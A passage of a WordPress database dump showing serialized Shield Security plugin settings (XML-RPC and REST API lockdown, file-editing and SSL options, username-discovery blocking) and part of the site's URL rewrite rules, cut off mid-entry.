site.\";}s:11:\"xcsp_custom\";a:11:{s:3:\"key\";s:11:\"xcsp_custom\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/g9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:155;s:4:\"name\";s:12:\"Manual Rules\";s:7:\"summary\";s:16:\"Manual CSP Rules\";s:11:\"description\";s:17:\"Manual CSP rules.\";}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510366,'_site_transient_timeout_shield_mod_config_lockdown','1632920474','no'),(510367,'_site_transient_shield_mod_config_lockdown','a:6:{s:4:\"slug\";s:8:\"lockdown\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"lockdown\";s:4:\"name\";s:11:\"WP Lockdown\";s:12:\"sidebar_name\";s:8:\"Lockdown\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"lockdown\";s:7:\"tagline\";s:56:\"Harden the more loosely controlled settings of your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:90;}s:8:\"sections\";a:5:{i:0;a:6:{s:7:\"primary\";b:1;s:4:\"slug\";s:14:\"section_apixml\";s:5:\"title\";s:25:\"WordPress System Lockdown\";s:11:\"title_short\";s:6:\"System\";s:9:\"beacon_id\";i:413;s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Lockdown certain core WordPress system features.\";i:1;s:99:\"Recommendation - This depends on your usage and needs for certain WordPress functions and features.\";}}i:1;a:5:{s:4:\"slug\";s:33:\"section_permission_access_options\";s:5:\"title\";s:30:\"Permissions and Access Options\";s:11:\"title_short\";s:11:\"Permissions\";s:9:\"beacon_id\";i:415;s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Provides finer control of certain WordPress permissions.\";i:1;s:75:\"Recommendation - Only enable SSL if you have a valid certificate installed.\";}}i:2;a:5:{s:4:\"slug\";s:35:\"section_wordpress_obscurity_options\";s:5:\"title\";s:27:\"WordPress Obscurity Options\";s:11:\"title_short\";s:9:\"Obscurity\";s:9:\"beacon_id\";i:418;s:7:\"summary\";a:2:{i:0;s:63:\"Purpose - Obscures certain WordPress settings from public view.\";i:1;s:103:\"Recommendation - Obscurity is not true security and so these settings are down to your personal tastes.\";}}i:3;a:5:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:5:\"title\";s:23:\"Enable Module: Lockdown\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:272;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Lockdown helps secure-up certain loosely-controlled WordPress settings on your site.\";i:1;s:53:\"Recommendation - Keep the Lockdown feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{s:15:\"enable_lockdown\";a:11:{s:3:\"key\";s:15:\"enable_lockdown\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4r\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:272;s:4:\"name\";s:15:\"Enable Lockdown\";s:7:\"summary\";s:39:\"Enable (or Disable) The Lockdown module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Lockdown module\";}s:14:\"disable_xmlrpc\";a:10:{s:3:\"key\";s:14:\"disable_xmlrpc\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e6\";s:9:\"link_blog\";s:19:\"https://shsec.io/fb\";s:9:\"beacon_id\";i:414;s:4:\"name\";s:15:\"Disable XML-RPC\";s:7:\"summary\";s:26:\"Disable The XML-RPC System\";s:11:\"description\";s:71:\"Checking this option will completely turn off the whole XML-RPC system.\";}s:25:\"disable_anonymous_restapi\";a:10:{s:3:\"key\";s:25:\"disable_anonymous_restapi\";s:7:\"section\";s:14:\"section_apixml\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Anonymous Rest API\";s:7:\"summary\";s:30:\"Disable The Anonymous Rest API\";s:11:\"description\";s:82:\"Checking this option will completely turn off the whole Anonymous Rest API system.\";}s:24:\"api_namespace_exclusions\";a:9:{s:3:\"key\";s:24:\"api_namespace_exclusions\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:11:\"woocommerce\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Rest API Exclusions\";s:7:\"summary\";s:29:\"Anonymous REST API Exclusions\";s:11:\"description\";s:81:\"Any namespaces provided here will be excluded from the Anonymous API restriction.\";}s:20:\"disable_file_editing\";a:10:{s:3:\"key\";s:20:\"disable_file_editing\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4q\";s:9:\"link_blog\";s:19:\"https://shsec.io/hk\";s:9:\"beacon_id\";i:416;s:4:\"name\";s:20:\"Disable File Editing\";s:7:\"summary\";s:51:\"Disable Ability To Edit Files From Within WordPress\";s:11:\"description\";s:135:\"Removes the option to directly edit any files from within the WordPress admin area. Equivalent to setting \'DISALLOW_FILE_EDIT\' to TRUE.\";}s:15:\"force_ssl_admin\";a:10:{s:3:\"key\";s:15:\"force_ssl_admin\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4t\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:417;s:4:\"name\";s:15:\"Force SSL Admin\";s:7:\"summary\";s:57:\"Forces WordPress Admin Dashboard To Be Delivered Over SSL\";s:11:\"description\";s:126:\"Please only enable this option if you have a valid SSL certificate installed. Equivalent to setting \'FORCE_SSL_ADMIN\' to TRUE.\";}s:22:\"block_author_discovery\";a:9:{s:3:\"key\";s:22:\"block_author_discovery\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf23\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Block Username Fishing\";s:7:\"summary\";s:69:\"Block the ability to discover WordPress usernames based on author IDs\";s:11:\"description\";s:150:\"When enabled, any URL requests containing \'author=\' will be killed. Warning: Enabling this option may interfere with expected operations of your site.\";}s:16:\"clean_wp_rubbish\";a:9:{s:3:\"key\";s:16:\"clean_wp_rubbish\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Clean WP Files\";s:7:\"summary\";s:41:\"Automatically Delete Unnecessary WP Files\";s:11:\"description\";s:63:\"Automatically delete WordPress files like wp-config-sample.php.\";}s:28:\"hide_wordpress_generator_tag\";a:9:{s:3:\"key\";s:28:\"hide_wordpress_generator_tag\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"WP Generator Tag\";s:7:\"summary\";s:28:\"Remove WP Generator Meta Tag\";s:11:\"description\";s:119:\"Remove a meta tag from your WordPress pages that publicly displays that your site is WordPress and its current version.\";}}s:11:\"definitions\";a:2:{s:26:\"default_restapi_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}s:6:\"events\";a:2:{s:23:\"block_anonymous_restapi\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:9:\"namespace\";}s:5:\"level\";s:7:\"warning\";s:6:\"recent\";b:1;}s:9:\"block_xml\";a:3:{s:5:\"level\";s:6:\"notice\";s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510368,'_site_transient_timeout_shield_mod_config_comms','1632920474','no'),(510369,'_site_transient_shield_mod_config_comms','a:7:{s:4:\"slug\";s:5:\"comms\";s:10:\"properties\";a:15:{s:4:\"slug\";s:5:\"comms\";s:11:\"storage_key\";s:5:\"comms\";s:4:\"name\";s:5:\"Comms\";s:10:\"menu_title\";s:5:\"Comms\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:2:{i:0;a:5:{s:7:\"primary\";b:1;s:4:\"slug\";s:16:\"section_suresend\";s:5:\"title\";s:14:\"SureSend Email\";s:11:\"title_short\";s:14:\"SureSend Email\";s:9:\"beacon_id\";i:156;}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{s:15:\"suresend_emails\";a:11:{s:3:\"key\";s:15:\"suresend_emails\";s:7:\"section\";s:16:\"section_suresend\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:13:\"value_options\";a:1:{i:0;a:2:{s:9:\"value_key\";s:3:\"2fa\";s:4:\"text\";s:29:\"2FA Login Codes (admins only)\";}}s:9:\"link_info\";s:18:\"https://icwp.io/ij\";s:9:\"link_blog\";s:18:\"https://icwp.io/ik\";s:4:\"name\";s:15:\"SureSend Emails\";s:7:\"summary\";s:15:\"SureSend Emails\";s:11:\"description\";s:16:\"SureSend Emails.\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:2:{s:16:\"suresend_success\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:5:\"email\";i:1;s:4:\"slug\";}s:5:\"level\";s:4:\"info\";}s:13:\"suresend_fail\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:5:\"email\";i:1;s:4:\"slug\";}s:5:\"level\";s:7:\"warning\";}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510370,'_site_transient_timeout_shield_mod_config_email','1632920474','no'),(510371,'_site_transient_shield_mod_config_email','a:6:{s:4:\"slug\";s:5:\"email\";s:10:\"properties\";a:12:{s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:5:\"email\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:0:{}s:7:\"options\";a:0:{}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510378,'_site_transient_timeout_apto-db-ready-c87773ece3','1632315702','no'),(510379,'_site_transient_apto-db-ready-c87773ece3','1','no'),(510411,'rewrite_rules','a:376:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:39:\"index.php?yoast-sitemap-xsl=$matches[1]\";s:29:\"^ninja-forms/([a-zA-Z0-9]+)/?\";s:36:\"index.php?nf_public_link=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:19:\"eventbrite-event/?$\";s:37:\"index.php?post_type=eventbrite_events\";s:49:\"eventbrite-event/feed/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?post_type=eventbrite_events&feed=$matches[1]\";s:44:\"eventbrite-event/(feed|rdf|rss|rss2|atom)/?$\";s:54:\"index.php?post_type=eventbrite_events&feed=$matches[1]\";s:36:\"eventbrite-event/page/([0-9]{1,})/?$\";s:55:\"index.php?post_type=eventbrite_events&paged=$matches[1]\";s:12:\"dashboard/?$\";s:26:\"index.php?action=dashboard\";s:16:\"1920webmaster/?$\";s:22:\"index.php?action=login\";s:9:\"logout/?$\";s:23:\"index.php?action=logout\";s:11:\"register/?$\";s:25:\"index.php?action=register\";s:15:\"lostpassword/?$\";s:29:\"index.php?action=lostpassword\";s:12:\"resetpass/?$\";s:26:\"index.php?action=resetpass\";s:16:\"confirmaction/?$\";s:30:\"index.php?action=confirmaction\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:57:\"cause-categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?cause_categories=$matches[1]&feed=$matches[2]\";s:52:\"cause-categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?cause_categories=$matches[1]&feed=$matches[2]\";s:33:\"cause-categories/([^/]+)/embed/?$\";s:49:\"index.php?cause_categories=$matches[1]&embed=true\";s:45:\"cause-categories/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?cause_categories=$matches[1]&paged=$matches[2]\";s:27:\"cause-categories/([^/]+)/?$\";s:38:\"index.php?cause_categories=$matches[1]\";s:58:\"sermon-categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?sermon_categories=$matches[1]&feed=$matches[2]\";s:53:\"sermon-categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?sermon_categories=$matches[1]&feed=$matches[2]\";s:34:\"sermon-categories/([^/]+)/embed/?$\";s:50:\"index.php?sermon_categories=$matches[1]&embed=true\";s:46:\"sermon-categories/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?sermon_categories=$matches[1]&paged=$matches[2]\";s:28:\"sermon-categories/([^/]+)/?$\";s:39:\"index.php?sermon_categories=$matches[1]\";s:57:\"event-categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?event_categories=$matches[1]&feed=$matches[2]\";s:52:\"event-categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?event_categories=$matches[1]&feed=$matches[2]\";s:33:\"event-categories/([^/]+)/embed/?$\";s:49:\"index.php?event_categories=$matches[1]&embed=true\";s:45:\"event-categories/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?event_categories=$matches[1]&paged=$matches[2]\";s:27:\"event-categories/([^/]+)/?$\";s:38:\"index.php?event_categories=$matches[1]\";s:58:\"videos_categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?videos_categories=$matches[1]&feed=$matches[2]\";s:53:\"videos_categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?videos_categories=$matches[1]&feed=$matches[2]\";s:34:\"videos_categories/([^/]+)/embed/?$\";s:50:\"index.php?videos_categories=$matches[1]&embed=true\";s:46:\"videos_categories/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?videos_categories=$matches[1]&paged=$matches[2]\";s:28:\"videos_categories/([^/]+)/?$\";s:39:\"index.php?videos_categories=$matches[1]\";s:44:\"kr_request_token/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"kr_request_token/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"kr_request_token/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"kr_request_token/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"kr_request_token/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"kr_request_token/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"kr_request_token/([^/]+)/embed/?$\";s:49:\"index.php?kr_request_token=$matches[1]&embed=true\";s:37:\"kr_request_token/([^/]+)/trackback/?$\";s:43:\"index.php?kr_request_token=$matches[1]&tb=1\";s:45:\"kr_request_token/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?kr_request_token=$matches[1]&paged=$matches[2]\";s:52:\"kr_request_token/([^/]+)/comment-page-([0-9]{1,})/?$\";s:56:\"index.php?kr_request_token=$matches[1]&cpage=$matches[2]\";s:41:\"kr_request_token/([^/]+)(?:/([0-9]+))?/?$\";s:55:\"index.php?kr_request_token=$matches[1]&page=$matches[2]\";s:33:\"kr_request_token/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"kr_request_token/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"kr_request_token/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"kr_request_token/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"kr_request_token/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"kr_request_token/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:43:\"kr_access_token/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:53:\"kr_access_token/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:73:\"kr_access_token/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"kr_access_token/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"kr_access_token/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:49:\"kr_access_token/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:32:\"kr_access_token/([^/]+)/embed/?$\";s:48:\"index.php?kr_access_token=$matches[1]&embed=true\";s:36:\"kr_access_token/([^/]+)/trackback/?$\";s:42:\"index.php?kr_access_token=$matches[1]&tb=1\";s:44:\"kr_access_token/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?kr_access_token=$matches[1]&paged=$matches[2]\";s:51:\"kr_access_token/([^/]+)/comment-page-([0-9]{1,})/?$\";s:55:\"index.php?kr_access_token=$matches[1]&cpage=$matches[2]\";s:40:\"kr_access_token/([^/]+)(?:/([0-9]+))?/?$\";s:54:\"index.php?kr_access_token=$matches[1]&page=$matches[2]\";s:32:\"kr_access_token/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"kr_access_token/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"kr_access_token/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"kr_access_token/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"kr_access_token/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"kr_access_token/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"nf_sub/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"nf_sub/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"nf_sub/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"nf_sub/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"nf_sub/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"nf_sub/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"nf_sub/([^/]+)/embed/?$\";s:39:\"index.php?nf_sub=$matches[1]&embed=true\";s:27:\"nf_sub/([^/]+)/trackback/?$\";s:33:\"index.php?nf_sub=$matches[1]&tb=1\";s:35:\"nf_sub/([^/]+)/page/?([0-9]{1,})/?$\";s:46:\"index.php?nf_sub=$matches[1]&paged=$matches[2]\";s:42:\"nf_sub/([^/]+)/comment-page-([0-9]{1,})/?$\";s:46:\"index.php?nf_sub=$matches[1]&cpage=$matches[2]\";s:31:\"nf_sub/([^/]+)(?:/([0-9]+))?/?$\";s:45:\"index.php?nf_sub=$matches[1]&page=$matches[2]\";s:23:\"nf_sub/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:33:\"nf_sub/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:53:\"nf_sub/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"nf_sub/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"nf_sub/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"nf_sub/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"eventbrite-event/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"eventbrite-event/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"eventbrite-event/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"eventbrite-event/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"eventbrite-event/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"eventbrite-event/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"eventbrite-event/([^/]+)/embed/?$\";s:50:\"index.php?eventbrite_events=$matches[1]&embed=true\";s:37:\"eventbrite-event/([^/]+)/trackback/?$\";s:44:\"index.php?eventbrite_events=$matches[1]&tb=1\";s:57:\"eventbrite-event/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?eventbrite_events=$matches[1]&feed=$matches[2]\";s:52:\"eventbrite-event/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:56:\"index.php?eventbrite_events=$matches[1]&feed=$matches[2]\";s:45:\"eventbrite-event/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?eventbrite_events=$matches[1]&paged=$matches[2]\";s:41:\"eventbrite-event/([^/]+)(?:/([0-9]+))?/?$\";s:56:\"index.php?eventbrite_events=$matches[1]&page=$matches[2]\";s:33:\"eventbrite-event/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"eventbrite-event/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"eventbrite-event/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"eventbrite-event/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"eventbrite-event/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"eventbrite-event/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:60:\"eventbrite_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?eventbrite_category=$matches[1]&feed=$matches[2]\";s:55:\"eventbrite_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:58:\"index.php?eventbrite_category=$matches[1]&feed=$matches[2]\";s:36:\"eventbrite_category/([^/]+)/embed/?$\";s:52:\"index.php?eventbrite_category=$matches[1]&embed=true\";s:48:\"eventbrite_category/([^/]+)/page/?([0-9]{1,})/?$\";s:59:\"index.php?eventbrite_category=$matches[1]&paged=$matches[2]\";s:30:\"eventbrite_category/([^/]+)/?$\";s:41:\"index.php?eventbrite_category=$matches[1]\";s:55:\"eventbrite_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?eventbrite_tag=$matches[1]&feed=$matches[2]\";s:50:\"eventbrite_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:53:\"index.php?eventbrite_tag=$matches[1]&feed=$matches[2]\";s:31:\"eventbrite_tag/([^/]+)/embed/?$\";s:47:\"index.php?eventbrite_tag=$matches[1]&embed=true\";s:43:\"eventbrite_tag/([^/]